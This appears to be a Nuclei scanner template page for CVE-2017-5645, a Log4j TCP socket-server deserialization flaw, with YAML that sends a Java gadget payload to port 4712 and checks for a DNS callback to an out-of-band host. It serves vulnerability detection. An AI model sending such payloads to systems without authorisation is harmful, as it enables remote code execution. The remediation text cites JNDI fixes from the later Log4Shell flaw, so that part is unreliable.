Skip to content
Nuclei Templates

Apache Log4j Server - Deserialization Command Execution

ID: CVE-2017-5645

Severity: critical

Author: princechaddha

Tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast,tcp

Description

Section titled “Description”

In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.

YAML Source

Section titled “YAML Source”
id: CVE-2017-5645


info:
  name: Apache Log4j Server - Deserialization Command Execution
  author: princechaddha
  severity: critical
  description: |
    In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
  impact: |
    Successful exploitation of this vulnerability could allow remote attackers to execute arbitrary commands on the affected server.
  remediation: |
    Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5645
    - http://www.openwall.com/lists/oss-security/2019/12/19/2
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
    - http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-5645
    cwe-id: CWE-502
    epss-score: 0.81948
    epss-percentile: 0.98292
    cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: log4j
  tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast,tcp
variables:
  end: "\r\n"
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:4712"
    inputs:
      - data: "{{generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)}}"
    read-size: 100
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns
# digest: 4a0a0047304502210093ab1b7a349cc19ae23df22da6938dd704cc2099706163e01967f0fa2d1fd0ed0220321a002151c5c6e9489cf9b79d3d738f94321ce037ca52f477d34aceb0d6e00a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "network/cves/2017/CVE-2017-5645.yaml"

View on Github